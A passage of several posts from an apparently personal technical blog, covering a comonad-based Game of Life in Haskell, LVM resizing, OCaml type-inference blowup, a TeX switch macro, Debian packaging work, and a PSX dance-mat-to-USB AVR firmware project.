listRight (LZ ls x (r:rs)) = LZ (x:ls) r rs
listRight _ = error "listRight"

Reading and writing on a list zipper at the cursor is straightforward :

listRead :: ListZipper a -> a
listRead (LZ _ x _) = x

listWrite :: a -> ListZipper a -> ListZipper a
listWrite x (LZ ls _ rs) = LZ ls x rs

We can also define a function to convert a list zipper to a list, for example for printing. As it’s infinite on both sides, it’s not possible to convert the whole zipper, so we have to pass a size parameter.

toList :: ListZipper a -> Int -> [a]
toList (LZ ls x rs) n =
  reverse (take n ls) ++ [x] ++ take n rs

We can easily define a Functor instance for ListZipper. To apply a function to the whole zipper, we apply it to the cursor and map it over the two lists :

instance Functor ListZipper where
  fmap f (LZ ls x rs) = LZ (map f ls) (f x) (map f rs)

Time for the Comonad instance. The extract method returns an element from the structure : we can pick the one at the cursor.

duplicate is a bit harder to grasp. From a list zipper, we have to build a list zipper of list zippers. The meaning behind this (confirmed by the comonad laws that every instance has to fulfill) is that moving inside the duplicated structure returns the original structure, altered by the same move : for example, listRead (listLeft (duplicate z)) == listLeft z.

This means that at the cursor of the duplicated structure, there is the original structure z. And the left list is composed of listLeft z, listLeft (listLeft z), listLeft (listLeft (listLeft z)), etc (same goes for the right list).

The following function repeatedly applies two movement functions, one on each side of the zipper (its type is more generic than needed for this specific case, but we’ll instantiate z with something other than ListZipper in the next section).

genericMove :: (z a -> z a)
            -> (z a -> z a)
            -> z a
            -> ListZipper (z a)
genericMove a b z =
  LZ (iterate' a z) z (iterate' b z)

iterate' :: (a -> a) -> a -> [a]
iterate' f = tail . iterate f

And finally we can implement the instance.

instance Comonad ListZipper where
  extract = listRead
  duplicate = genericMove listLeft listRight

Using this comonad instance we can already implement 1D cellular automata, as explained in the sigfpe article. Let’s see how they can be extended to 2D automata.
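For readers who want to play with the idea outside Haskell, here is a Python sketch. Python has no lazy infinite lists, so this version assumes a finite row that wraps around (a ring). That changes the boundary behaviour compared to the zipper above. The class name RingZipper and the choice of rule 90 (each cell becomes the XOR of its two neighbours) as the 1D automaton are illustrative. extend is derived as extend f = fmap f . duplicate.

```python
from dataclasses import dataclass
from typing import Callable, Generic, TypeVar

A = TypeVar("A")
B = TypeVar("B")


@dataclass(frozen=True)
class RingZipper(Generic[A]):
    """A list zipper over a finite ring: `cells` is the whole row, `pos` the cursor."""
    cells: tuple
    pos: int

    def left(self) -> "RingZipper[A]":
        return RingZipper(self.cells, (self.pos - 1) % len(self.cells))

    def right(self) -> "RingZipper[A]":
        return RingZipper(self.cells, (self.pos + 1) % len(self.cells))

    def extract(self) -> A:  # listRead
        return self.cells[self.pos]

    def fmap(self, f: Callable[[A], B]) -> "RingZipper[B]":
        return RingZipper(tuple(f(c) for c in self.cells), self.pos)

    def duplicate(self) -> "RingZipper[RingZipper[A]]":
        # Cell i holds the original zipper with its cursor moved to i.
        shifted = tuple(RingZipper(self.cells, i) for i in range(len(self.cells)))
        return RingZipper(shifted, self.pos)

    def extend(self, f: Callable[["RingZipper[A]"], B]) -> "RingZipper[B]":
        return self.duplicate().fmap(f)


def rule90(z: RingZipper) -> bool:
    # Local rule: a cell becomes the XOR of its two neighbours.
    return z.left().extract() != z.right().extract()
```

For instance, RingZipper(tuple(i == 3 for i in range(7)), 0).extend(rule90) turns the single live cell into two live cells at positions 2 and 4.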

Plane zippers

Let’s generalize list zippers to plane zippers, which are cursors on a plane of cells. We will implement them using a list zipper of list zippers.

data Z a = Z (ListZipper (ListZipper a))

We start by defining move functions. As a convention, the external list will hold lines : to move up and down, we will really move left and right at the root level.

up :: Z a -> Z a
up (Z z) = Z (listLeft z)

down :: Z a -> Z a
down (Z z) = Z (listRight z)

For left and right, it is necessary to alter every line, using the Functor instance.

left :: Z a -> Z a
left (Z z) = Z (fmap listLeft z)

right :: Z a -> Z a
right (Z z) = Z (fmap listRight z)

Finally, editing is quite straightforward : reading is direct (first read the line, then the cursor) ; in order to write, it is necessary to fetch the current line, write to it and write the new line back.

zRead :: Z a -> a
zRead (Z z) = listRead $ listRead z

zWrite :: a -> Z a -> Z a
zWrite x (Z z) =
  Z $ listWrite newLine z
    where
      newLine = listWrite x oldLine
      oldLine = listRead z

Time for algebra. Let’s define a Functor instance : applying a function everywhere can be achieved by applying it on every line.

instance Functor Z where
  fmap f (Z z) = Z (fmap (fmap f) z)

The idea behind the Comonad instance for Z is the same as for ListZipper : moving “up” in the structure (really, “left” at the root level) returns the original structure moved in this direction.

We will reuse the genericMove defined earlier in order to build list zippers that describe movements in the two axes⁴.

horizontal :: Z a -> ListZipper (Z a)
horizontal = genericMove left right

vertical :: Z a -> ListZipper (Z a)
vertical = genericMove up down

This is enough to define the instance.

instance Comonad Z where
  extract = zRead
  duplicate z = Z $ fmap horizontal $ vertical z

Conway’s (comonadic) Game of Life

Let’s define a neighbourhood function. Here, directions are moves on a plane zipper. Neighbours are : horizontal moves, vertical moves and their compositions (liftM2 (.))⁵.

neighbours :: [Z a -> Z a]
neighbours =
  horiz ++ vert ++ liftM2 (.) horiz vert
  where
    horiz = [left, right]
    vert  = [up, down]

aliveNeighbours :: Z Bool -> Int
aliveNeighbours z =
  card $ map (\ dir -> extract $ dir z) neighbours

card :: [Bool] -> Int
card = length . filter (==True)
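To check that horiz ++ vert ++ liftM2 (.) horiz vert really yields the eight neighbours, here is a small sketch in C (not part of the original code) that models each move as a (dx, dy) offset, so that composing two moves simply adds their offsets. The move type and the neighbours function are made up for this illustration; the Haskell version works on zippers, not coordinates.

```c
#include <stddef.h>

/* A move on the plane, modelled as an offset (assumption of this sketch). */
typedef struct { int dx; int dy; } move;

static const move horiz[] = { { -1, 0 }, { 1, 0 } };  /* left, right */
static const move vert[]  = { { 0, -1 }, { 0, 1 } };  /* up, down */

/* Composing two moves amounts to adding their offsets. */
static move compose(move a, move b)
{
    move m = { a.dx + b.dx, a.dy + b.dy };
    return m;
}

/* Fill out[] with horiz ++ vert ++ liftM2 (.) horiz vert; return the count. */
static size_t neighbours(move out[8])
{
    size_t n = 0;
    for (size_t i = 0; i < 2; i++)
        out[n++] = horiz[i];
    for (size_t i = 0; i < 2; i++)
        out[n++] = vert[i];
    /* liftM2 in the list monad: outer loop on the first list, inner on the second */
    for (size_t i = 0; i < 2; i++)
        for (size_t j = 0; j < 2; j++)
            out[n++] = compose(horiz[i], vert[j]);
    return n;
}
```

The four compositions are exactly the diagonal neighbours, which is why no case is missing or counted twice.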

The core rule of the game fits in the following function : if two neighbours are alive, the cell keeps its previous state ; if three neighbours are alive, the cell is alive (a new cell is born, or an existing one survives), and any other count causes the cell to die (of under-population or overcrowding).

It is remarkable that its type, Z Bool -> Bool (of the shape w a -> b), is the dual of that of a Kleisli arrow (a -> m b).

rule :: Z Bool -> Bool
rule z =
  case aliveNeighbours z of
    2 -> extract z
    3 -> True
    _ -> False
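For comparison, here is the same local rule in an imperative setting: a small C sketch on a finite grid whose edges wrap around (a torus). The fixed 5×5 size and the wrap-around are assumptions made only to keep the grid finite; the zippers above are infinite. Note how evolve has to fill a second grid so that every cell is computed from the old generation, which is the kind of bookkeeping that extend hides.

```c
#include <stdbool.h>
#include <string.h>

#define W 5  /* grid width (assumption of this sketch) */
#define H 5  /* grid height */

/* Local rule, same logic as the Haskell `rule`. */
static bool rule(bool alive, int n)
{
    switch (n) {
    case 2:  return alive;  /* keep the previous state */
    case 3:  return true;   /* birth or survival */
    default: return false;  /* under-population or overcrowding */
    }
}

/* Count live neighbours, wrapping around the edges. */
static int alive_neighbours(bool g[H][W], int y, int x)
{
    int n = 0;
    for (int dy = -1; dy <= 1; dy++)
        for (int dx = -1; dx <= 1; dx++) {
            if (dx == 0 && dy == 0)
                continue;
            int yy = (y + dy + H) % H;
            int xx = (x + dx + W) % W;
            n += g[yy][xx];
        }
    return n;
}

/* Imperative counterpart of `extend rule`: apply the rule everywhere,
   writing into a copy so that every cell sees the old generation. */
static void evolve(bool g[H][W])
{
    bool next[H][W];
    for (int y = 0; y < H; y++)
        for (int x = 0; x < W; x++)
            next[y][x] = rule(g[y][x], alive_neighbours(g, y, x));
    memcpy(g, next, sizeof next);
}
```

A horizontal “blinker” (three cells in a row) becomes vertical after one call to evolve, and horizontal again after a second one.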

And then the comonadic magic happens with the use of extend :

evolve :: Z Bool -> Z Bool
evolve = extend rule

evolve is our main transition function between world states, and yet it’s only defined in terms of the local transition function !

Let’s define a small printer to see what’s going on.

dispLine :: ListZipper Bool -> String
dispLine z =
  map dispC $ toList z 6
  where
    dispC True  = '*'
    dispC False = ' '

disp :: Z Bool -> String
disp (Z z) =
  unlines $ map dispLine $ toList z 6

Here is the classic glider pattern to test. The definition has a lot of boilerplate because we did not bother to create a fromList function.

glider :: Z Bool
glider =
  Z $ LZ (repeat fz) fz rs
  where
    rs = [ line [f, t, f]
         , line [f, f, t]
         , line [t, t, t]
         ] ++ repeat fz
    t = True
    f = False
    fl = repeat f
    fz = LZ fl f fl
    line l = LZ fl f (l ++ fl)

*Main> putStr $ disp glider
 *
  *
***
*Main> putStr $ disp $ evolve glider
* *
 **
 *

We did it ! Implementing Conway’s Game of Life is usually full of ad-hoc boilerplate code : iterating loops, managing copies of cells, etc. Using the comonadic structure of cellular automata, the code can be a lot simpler.

In this example, ListZipper and Z would belong in a library, so the actual implementation is only a dozen lines long!

The real benefit is that it has really helped me grasp the concept of comonads. I hope that I did not just fall into the comonad tutorial fallacy :)

Update (March 10th): Brian Cohen contributed a simple extension to simulate a closed topology. Thanks !

Or download the source on github.↩︎

In the real Haskell typeclass, there are the following differences: Monad and Functor are not related, join is a library function (you can’t use it to define an instance), (>>=) is used instead of its flipped counterpart (=<<) and there are two more methods, (>>) and fail.↩︎

Simulating a closed topology such as a torus may even be possible using cyclic lists instead of lazy infinite lists. Update: see Brian Cohen’s response at the end of this post.↩︎

At first I thought that it was possible to use only the Comonad instance of ListZipper to define horizontal and vertical, but I couldn’t come up with a solution. The problem is that in that case, the z generic parameter is instantiated to Z, not ListZipper. For that reason I believe that my initial thought can’t be implemented. Maybe it’s possible with a comonad transformer or something like that.↩︎

This could have been written out explicitly, as there are only 8 cases, but it’s funnier and arguably less error-prone this way :-)↩︎

Resizing a LVM partition

Etienne Millon — Tue, 13 May 2014 00:00:00 UT

I like to have /home on a separate partition. But sometimes it can backfire. If the root partition is full, you don’t have a lot of solutions. In particular, I found that debian-installer’s “automatic partitioning” sometimes creates very small root partitions. If you want to install big packages (ghc, eclipse, libreoffice, …), a 16GiB root partition is not enough.

In the past, filesystems sat directly on top of partitions, which made it very difficult to change their size.

Modern systems (post-1998) can use LVM, which is a layer between filesystems and partitions. One of its advantages is that you can resize logical volumes (a LV is the virtual device node where the filesystem sits) after they have been created.

To resize the / and /home filesystems, it is necessary to change the size of both the filesystems and the LVs. But the order matters: at any time, the filesystem must be no larger than its LV. So, the correct order of operations is:

shrink home filesystem

shrink home LV

expand root LV

expand root filesystem

Wait a second before you start reaching for your favorite live CD: all these operations can be done online. Actually, the first two need /home to be unmounted, so they have to be done in single user mode. Online expansion of the root filesystem is fairly new (it’s from Linux 3.3, 2012) but it works like a charm.

Manipulating partition and volume sizes is always a bit tricky. Sometimes you have to give sizes in blocks, sometimes in bytes. Sometimes it’s multiples of 1000 and sometimes it’s multiples of 1024. I would not feel comfortable after typing 4 commands with 4 sizes. Fortunately, LVM tools are wonderful and can “talk” to the underlying filesystem (using fsadm). And LVM knows how much space is free, so it can expand a volume to completely fill the disk (or more precisely the volume group).

In a nutshell, this complex operation can be done in two commands (in single user mode):

lvresize -r -L 800G /dev/mapper/machine-home
lvresize -r -l '+100%FREE' /dev/mapper/machine-root

The -r switch enables fsadm, so that the filesystem is resized together with the LV. -L gives the new size with a unit (here 800G), and -l gives it in terms of LVM extents (+100%FREE means: increase by the whole free space, i.e. fill the volume group).

That was almost too easy!

Making type inference explode

Etienne Millon — Wed, 21 May 2014 00:00:00 UT

Hindley-Milner type systems are in a sweet spot in that they are both expressive and easy to infer. For example, type inference can turn this program:

let rec length = function
  | [] -> 0
  | x::xs -> 1 + length xs

into this one (the top-level type 'a list -> int is usually what is interesting but the compiler has to infer the type of every subexpression):

let rec length : 'a list -> int = function
  | [] -> (0 : int)
  | (x:'a)::(xs : 'a list) ->
      (1 : int) + ((length : 'a list -> int) (xs : 'a list) : int)

Because the compiler does so much work, it is reasonable to wonder whether it is efficient. The theoretical answer to this question is that type inference is EXP-complete, but given reasonable constraints on the program, it can be done in quasi-linear time (n log n where n is the size of the program).

Still, one may wonder what kind of pathological cases show this exponential effect. Here is one such example:

let p x y = fun z -> z x y ;;

let r () =
  let x1 = fun x -> p x x in
  let x2 = fun z -> x1 (x1 z) in
  let x3 = fun z -> x2 (x2 z) in
  x3 (fun z -> z);;

The type signature of r is already daunting:

% ocamlc -i types.ml val p : 'a -> 'b -> ('a -> 'b -> 'c) -> 'c val r : unit -> (((((((('a -> 'a) -> ('a -> 'a) -> 'b) -> 'b) -> ((('a -> 'a) -> ('a -> 'a) -> 'b) -> 'b) -> 'c) -> 'c) -> ((((('a -> 'a) -> ('a -> 'a) -> 'b) -> 'b) -> ((('a -> 'a) -> ('a -> 'a) -> 'b) -> 'b) -> 'c) -> 'c) -> 'd) -> 'd) -> ((((((('a -> 'a) -> ('a -> 'a) -> 'b) -> 'b) -> ((('a -> 'a) -> ('a -> 'a) -> 'b) -> 'b) -> 'c) -> 'c) -> ((((('a -> 'a) -> ('a -> 'a) -> 'b) -> 'b) -> ((('a -> 'a) -> ('a -> 'a) -> 'b) -> 'b) -> 'c) -> 'c) -> 'd) -> 'd) -> 'e) -> 'e

But what’s interesting about this program is that we can add (or remove) lines to study how input size can alter the processing time and output type size. It explodes:

n   wc -c     time   leaves(n)
1   98        15ms   1
2   167       15ms   2
3   610       15ms   8
4   11630     38ms   128
5   4276270   6.3s   32768

Observing the number of ('a -> 'a) leaves in the output type reveals that it is squared and doubled at each step, leading to an exponential growth.
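The recurrence behind the leaves(n) column, leaves(1) = 1 and leaves(n+1) = 2 × leaves(n)², can be checked in a few lines of C. Solving it gives leaves(n) = 2^(2^(n-1) - 1), which is why the numbers outgrow machine integers so quickly. This is only a sketch reproducing the table’s column from the recurrence stated above, not a measurement of what the compiler does.

```c
#include <stdint.h>

/* leaves(n) as in the table: leaves(1) = 1, leaves(n + 1) = 2 * leaves(n)^2.
   The result fits in 64 bits only up to n = 7 (where it equals 2^63). */
static uint64_t leaves(unsigned n)
{
    uint64_t l = 1;
    for (unsigned i = 1; i < n; i++)
        l = 2 * l * l;  /* square, then double */
    return l;
}
```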

In practice, this effect does not appear in day-to-day programs because programmers annotate the top-level declarations with their types. In that case, the size of the types would be merely proportional to the size of the program, because the type annotation itself would be gigantic.

Also, programmers tend to write functions that do something useful, which these do not seem to do ☺.

Bring your own switch

Etienne Millon — Thu, 05 Jun 2014 00:00:00 UT

TeX is a very primitive language. Everything is dynamic, even parsing. This explains in part why it takes so long to compile.

It also means that it’s very flexible : it’s possible to define your own control structures. Here is a small explanation of an implementation of a “switch” macro I made last year. It is released as part of my discotex library (a collection of macros, really).

We want to define a control structure that we can use in the following way:

\switch{what}{case1}{then1}
            {case2}{then2}
            {case3}{then3}
            {END}

Then, if what is equal to case1, the whole construct evaluates to then1, etc. This looks like a function with a variable number of arguments, but this actually fits well with how TeX works.

In TeX, control is provided through macros, i.e. rules to rewrite text. Suppose we want to write a macro that expands to “x and y”. LaTeX users are used to the following syntax:

\newcommand{\couple}[2]{#1 and #2}

But in TeX this is written:

\def\couple#1#2{#1 and #2}

Which roughly means that after reading \couple, TeX will read two strings¹ and bind them to #1 and #2 in the body. So \couple{A}{B} is expanded to A and B.

Here comes the trick used for defining variadic functions: if more arguments are provided than the number of parameters at the definition point, the extra ones are left in place. If fewer arguments are provided, the strings after the call site will be used. So, one can look at TeX functions as just a system to pop strings from the calling site.

Using this, we can implement \switch:

After reading \switch, read two arguments so that we’re considering \switch{what}{x}.

If x is equal to END, it is an error: we did not find the entry. The END string is not special to TeX, it is just a convention of our macro.

Otherwise, pop one more string so that we’re considering \switch{what}{case}{then}.

If what is not equal to case, we have to recursively call \switch{what} which will pop the rest.

If what is equal to case, then the result is then. But it is not enough to return it: we have to pop strings until END is reached. Otherwise they would be output normally and put in the document.

These steps map well onto three macros in the final TeX code.

To read the first case, we write a function with only two parameters. For string comparison we use \ifstrequal{a}{b}{t}{f}², which expands to t if a and b are equal, or to f otherwise. Note that \switch@next is the name of a single function: in .sty files, it is possible to use @ in symbol names. This is a convention for private macros, since they cannot be used directly in .tex files.

\def\switch#1#2{%
  \ifstrequal{#2}{END}{%
    \errmessage{switch : case "#1" not found}%
  }{%
    \switch@next{#1}{#2}%
  }%
}

\switch@next does the actual comparison and the recursive call.

\def\switch@next#1#2#3{%
  \ifstrequal{#1}{#2}%
    {#3\switch@last}%
    {\switch{#1}}%
}

Then \switch@last is a simple recursive function which simulates a loop. Because the recursive call is done without an explicit parameter, it will keep on popping strings until finding END.

\def\switch@last#1{%
  \ifstrequal{#1}{END}%
    {}%
    {\switch@last}%
}

That’s it, the macro works. You can even try it!
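To make the order in which arguments are consumed explicit, here is a rough C model of the three macros. It is only an illustration: TeX works on tokens and groups, which this sketch reduces to an array of strings (one per {...} group after \switch{what}), and the names tex_switch and switch_last are made up.

```c
#include <stddef.h>
#include <string.h>

/* Like \switch@last: pop groups until END, return the position after it. */
static size_t switch_last(const char *const *args, size_t pos)
{
    while (strcmp(args[pos], "END") != 0)
        pos++;
    return pos + 1;
}

/* Like \switch and \switch@next. Returns the selected "then" string, or NULL
   where the macro would raise \errmessage. *next receives the position right
   after END, i.e. where TeX would resume reading the document. */
static const char *tex_switch(const char *what, const char *const *args,
                              size_t *next)
{
    size_t pos = 0;
    for (;;) {
        const char *x = args[pos++];          /* \switch#1#2 pops a case */
        if (strcmp(x, "END") == 0) {
            *next = pos;
            return NULL;                      /* case not found */
        }
        const char *then = args[pos++];       /* \switch@next pops #3 */
        if (strcmp(what, x) == 0) {
            *next = switch_last(args, pos);   /* discard the other cases */
            return then;
        }
        /* otherwise: the recursive call \switch{what} on the rest */
    }
}
```

With the groups {a}{1}{b}{2}{c}{3}{END}, looking up b yields 2, and reading resumes right after END in both the found and the not-found case.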

I am not sure that I would like to write more complex control structures but this was useful to me both in writing it and using it. I hope that you enjoyed it!

I am not sure that this is the correct terminology. For example, it will read a string between curly braces, or a single character if they are omitted. In that case it also eats whitespace, which is why you need stuff like \xspace to prevent your macros from gluing strings together.↩︎

It is from the etoolbox package. How it works is an implementation detail here, though it would probably be interesting.↩︎

My part of work in Debian Jessie

Etienne Millon — Fri, 21 Nov 2014 00:00:00 UT

Right now, Debian Jessie is frozen, and in a fairly good shape. The number of RC bugs is low, which means that the release should be “quite” near (“when it is ready”).

It is a good time to make a summary of my contributions during this release cycle.

New packages in Debian

For Jessie I have added no less than 6 new packages to the archive.

subliminal is a tool to automatically download subtitles for movie files. Packaging it also required packaging a few of its dependencies that were not available in Debian: babelfish, enzyme, guessit, and pysrt.

glyr is a library to query lyrics sites. I packaged it because the new version of gmpc requires it, but at the moment it is just a leaf package.

New packages I’m taking care of

I have the pleasure of being the new maintainer for feedparser, a Python library for parsing RSS and Atom feeds. It is my most popular package: according to popcon, 40% of users have it installed! During this release cycle, I backported the work done in Ubuntu, and worked on providing a Python 3 version of this package.

Updates on my packages

gmpc and gmpc-plugins did not change a lot. Upstream is working on a big new version but it is not released yet. During this Debian cycle, I mostly did janitorial work: I disabled outdated provider plugins, enabled multi-arch support, and ported to a recent version of Vala.

rss2email got a new upstream maintainer. This is really great since the code needed some love. The whole program got rewritten in Python 3, and this mandated a major version bump, creating the rss2email 3.x branch.

One of the side-effects of this rewrite is that the configuration file format changed. Actually the 2.x version used a plain Python file for configuration, which was eval()uated within the program’s context. Now it is based on ConfigParser. The on-disk state file, which serializes what feeds you are subscribed to and when you last refreshed them, also changed its format, from a pickle file to a JSON file.

This incompatibility is necessary and welcome, but it is tough to manage within the context of a software distribution. If a user upgrades his packages, he should find his programs working as before. So, I wrote an r2e-migrate script that converts a 2.x state file to a 3.x state file. Designing a clean upgrade path was very interesting. Indeed, it is not possible to do this during the package installation: since the config and state files are in every user’s $HOME, it is necessary to wait for each user to do his migration. The solution I arrived at is the following: when rss2email 3.x starts and has no state file, it checks whether an rss2email 2.x state file exists. If so, it prompts the user to run r2e-migrate. A few iterations were necessary before it worked as I wanted, so I am happy to have used the experimental suite for this. Once everything was working I uploaded the package to unstable and it seems to be working well. I am very happy with how this went, and I could close a lot of bugs in this package, also thanks to the new, responsive upstream.

visualboyadvance only got cosmetic changes: a patch for fixing the build with the new GCC flags, enabling hardening etc. I somehow missed the notification email for an important bug (#740292) that came with a patch; I merged it, but unfortunately it is too late to include it in Jessie. I would like to give the package more love for the next release, maybe including the newer vba-m fork.

zsnes is an interesting package to maintain because it’s written in x86 assembly and has been dormant upstream for a few years now. During this release cycle there were no real breakthroughs, but a lot of little niceties. For example, we now have a debug package, and build packages for kfreebsd and the hurd. Enabling hardening options also made us discover several memory manipulation errors.

I would like to include a more recent upstream snapshot, but the whole situation is a little complicated as there seem to be several forks lying around.

Package given for adoption

In 2012 I started to take care of the coin* packages. I adopted coinor-cbc and began to plan a transition for all the related packages, but because of a lack of time and interest I did not go all the way.

Fortunately Miles Lubin proposed to adopt these packages and is doing great work on them. Thanks Miles!

Incomplete work

I wanted to package several programs that did not make it to the archive.

brogue is a rogue-like in the most traditional fashion: grid-based and turn by turn. Most of the packaging work I did was on an unpackaged dependency, libtcod. It needed a bit of work so that it can be used when installed in /usr and not only from an unpacked source tree.

opentyrian is a free rewrite of the classic shoot-em-up Tyrian. As usual for this kind of project, it only covers the software part. You still need a copy of the original game to play. In that case it is easier since the game can be downloaded from the author’s website. But since it is not free, Debian cannot host these files. So it is necessary to download them at install time using a tool named game-data-packager. I worked with Alexandre Detiste on a patch to support this (#739486), but unfortunately the project seems dormant and this is blocking the inclusion of opentyrian in Debian.

stepmania is an open source clone of the “Dance Dance Revolution” game. It is a very popular piece of software, and an Intent To Package bug has been open for it since 2003. But it used to include non-free (and actually, copyright-infringing) pieces of artwork from the original game, which made it unsuitable for inclusion. However, the newer versions are more compliant and I am still working on this. There are two problems remaining: first, there is a lot of code and artwork for which the copyright and licensing information is unclear (though it does seem that the infringing material has been removed). And second, it embeds a lot of libraries; it’s necessary to patch it so that it can use the system copies. I sincerely hope that it will be part of Stretch since I could not deliver it for Jessie.

Debian Maintainer

So far, every time I need to push a package to the Debian archive, I need to ask someone with upload permissions to review my work and upload it. It ensures that the archive stays legal and of high quality, but it is definitely a non-negligible amount of friction every time I need to upload a package.

A couple of weeks ago I decided to apply as a Debian Maintainer. Once this is done, I will be able to upload my packages without this sponsoring step. Exciting!

Let’s all hope that the freeze will be over soon and we will enjoy once again a great release.

Converting a Dance Dance Revolution mat to USB

Etienne Millon — Thu, 27 Nov 2014 00:00:00 UT

Abstract: I transform a Playstation/parallel port converter to USB. This includes finding the pinout of the previous circuit, making an AVR toolchain work, and writing the firmware. Some bugs are found, and fixed. The result is open source.

Do you pine for the days when people were people and wrote their own device drivers? Some days are still like that, you just have to take the opportunity.

Recently while organizing my place I found two abandoned items that were meant to meet each other: a Dance Dance Revolution mat and a Teensy++ development board. This project is the story of their union.

Finding the pinout

So, I stumbled upon an old DDR mat and I wanted to play with it. The easiest way is using Stepmania, a simulator that works on Linux (and that I am trying to package for Debian). But some interface is needed to connect dancing mats (usually made for the Playstation) to a computer.

In a previous life I replaced the Playstation connector of this mat with a parallel port connector. In the beginning of the 2000s, the popular circuit to do this was Direct Pad Pro, and on Linux there was a similar driver documented in joystick-parport.txt.

Needless to say, I do not have a parallel port on my computer anymore, so some conversion is required. I also happen to have a USB development board on hand, so a possible solution is to program it to drive the Playstation mat.

In the picture above, two things are connected to the parallel port: the DDR mat and a female SNES connector. The driver indeed supported several gamepads, even of different types.

The first step was to note the pinout of the existing connection:

DB25
 2 ───────── orange
 3 ───────── yellow
 4 ───────── blue
 5 ──▷|─┐
 6 ──▷|─┤
 7 ──▷|─┼─── pink
 8 ──▷|─┤
 9 ──▷|─┘
11 ───────── brown
19 ─────┐
20 ─────┤
21 ─────┤
22 ─────┼─── black
23 ─────┤
24 ─────┤
25 ─────┘
NC ── green

According to the kernel documentation, this means that pin 11 is the data pin for the Playstation pad (the SNES pad was #1 and the PSX pad was #2).

This was enough to reconstruct the correct pinout. Note that the kernel numbers PSX pins in the opposite order of everything else I have seen. The following table uses kernel order.

Color    DB25 #   PSX #   Function
orange   2        8       Command
yellow   3        4       Select
blue     4        3       Clock
pink     5-9 ¹    5       Vcc
brown    11       9       Data
black    19-25    6       Ground
green    NC

At first, I was worried by the green wire that was not connected but this confirms that it was not needed.

Connecting it to the teensy++

The teensy++ is a development board with an AT90USB1286 microcontroller, from the AVR family. It has many GPIO ports, so I had to make a choice regarding the pins to be used. I chose this pinout:

AVR port   Color    Function   Direction
Vcc        pink     Vcc        Power
GND        black    Ground     Power
PC0        brown    Data       D→H
PC1        orange   Command    H→D
PC2        yellow   Select     H→D
PC3        blue     Clock      H→D

The Data signal is the only one that goes from the Device (DDR mat) to the Host (microcontroller), but since each pin can be used as an input or as an output, this does not constrain the choice.

So, let’s connect the DDR mat to the microcontroller. As the board already has male pin headers for breadboard usage, I soldered female pin headers to wires.

Programming the teensy++

I had two main problems writing the firmware: first, the manufacturer seems to recommend Teensy Loader to program the microcontroller. This is a GUI app which does not seem to be free software. Fortunately, I found a packaged version of teensy-loader-cli, which is a CLI tool, GPL3, and works well. The following command will program the microcontroller:

teensy-loader-cli -mmcu=at90usb1286 blink_slow_Teensy2pp.hex

The second quirk is that most of the documentation that can be found is for using the teensy++ as an Arduino. But I prefer writing low-level code: just memory-mapped registers, a C compiler, and me. So I aptitude-installed gcc-avr and avr-libc and opened vim.

There are several differences in how you program microcontrollers as an Arduino and as a plain AVR. For example here is how you configure PC0 to be an input with a pull-up resistor (so that it reads 1 when the pin is disconnected):

DDRC &= ~(1 << PC0);
PORTC |= (1 << PC0);

This clears bit PC0 of register DDRC (Data Direction Register C, nothing to do with Dance Dance Revolution) and sets bit PC0 of the PORTC register. Instead, the corresponding Arduino code is:

pinMode(10, INPUT_PULLUP);

To do that, the library has a mapping from pin numbers (an Arduino-specific terminology, it seems) to register names.
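Without that mapping, the two register statements can still be wrapped in small helpers. A minimal sketch, assuming the registers are passed by address (with avr-libc, DDRC expands to a dereferenced volatile pointer, so &DDRC should work); the helper names input_pullup and output are made up, and the test uses plain bytes instead of real registers.

```c
#include <stdint.h>

/* Configure bit `bit` of a port as an input with its pull-up enabled.
   On the AVR, ddr and port would point to registers such as DDRC and PORTC. */
static void input_pullup(volatile uint8_t *ddr, volatile uint8_t *port,
                         uint8_t bit)
{
    *ddr &= (uint8_t)~(1u << bit);   /* 0 in DDRx: the pin is an input */
    *port |= (uint8_t)(1u << bit);   /* 1 in PORTx on an input: pull-up on */
}

/* Configure bit `bit` of a port as an output. */
static void output(volatile uint8_t *ddr, uint8_t bit)
{
    *ddr |= (uint8_t)(1u << bit);    /* 1 in DDRx: the pin is an output */
}
```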

The PSX protocol

Time to write the code itself. My absolute reference for programming and interfacing the Playstation is Everything You Have Always Wanted to Know about the Playstation But Were Afraid to Ask. See section 9 for controllers.

The idea is that every frame (16 ms), Select goes low, and bytes are transferred, LSB first, synchronously over the Command (H→D) and Data (D→H) pins. Select goes high again after all bytes are transferred.

This means that every time a bit is transferred to the gamepad, a bit is read at the same time. For every bit, the following operations are needed:

set Command according to the bit to transmit;

put Clock down;

wait half a clock cycle;

read Data: that is the bit received;

put Clock up;

wait half a clock cycle.

Or, if you prefer in C:

static uint8_t transmit(uint8_t in) {
    uint8_t out = 0;
    for (int i = 0; i < 8; i++) {
        /* Put bit i of the command (LSB first) on Command */
        int bit_in = in & (1 << i);
        if (bit_in) {
            signal_up(PSX_PIN_CMD);
        } else {
            signal_down(PSX_PIN_CMD);
        }
        signal_down(PSX_PIN_CLOCK);
        _delay_us(DELAY_CLOCK_US);
        /* Sample Data while Clock is low: this is bit i of the answer */
        int bit_out = signal_read(PSX_PIN_DATA);
        if (bit_out) {
            out |= (1 << i);
        } else {
            out &= ~(1 << i);
        }
        signal_up(PSX_PIN_CLOCK);
        _delay_us(DELAY_CLOCK_US);
    }
    return out;
}

During normal operation, the bytes exchanged should be the following:

Byte #   Command   Data
1        0x01      0xFF
2        0x42      0x41
3        0x00      0x5A
4        0x00      data1
5        0x00      data2

Keypress information can be found in the 16-bit number ((data2 << 8) | data1). If a bit is 0, it means that the corresponding button is pressed.
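Putting the byte table and this formula together, a reply can be checked and turned into the 16-bit state. A minimal sketch: reply[] is assumed to hold the five bytes returned by transmit() for the five command bytes, and psx_parse is a made-up name.

```c
#include <stdbool.h>
#include <stdint.h>

/* Check the reply bytes of one poll and assemble (data2 << 8) | data1.
   Returns false if bytes 2 and 3 are not the expected 0x41 and 0x5A. */
static bool psx_parse(const uint8_t reply[5], uint16_t *state)
{
    if (reply[1] != 0x41 || reply[2] != 0x5A)
        return false;
    *state = (uint16_t)((reply[4] << 8) | reply[3]);
    return true;
}
```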

Bit #   Key          Bit #   Key
0       Select       8       L2
1       (always 1)   9       R2
2       (always 1)   10      L1
3       Start        11      R1
4       Up           12      Triangle
5       Right        13      Circle
6       Down         14      Cross
7       Left         15      Square
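Decoding the state is then a matter of testing each bit against this table, keeping in mind that buttons are active low. A sketch with hypothetical names (psx_keys, pressed_keys):

```c
#include <stddef.h>
#include <stdint.h>

/* Button names indexed by bit number; NULL marks the two bits that are always 1. */
static const char *const psx_keys[16] = {
    "Select", NULL, NULL, "Start", "Up", "Right", "Down", "Left",
    "L2", "R2", "L1", "R1", "Triangle", "Circle", "Cross", "Square",
};

/* Store the names of pressed buttons in names[] (at most 14) and return
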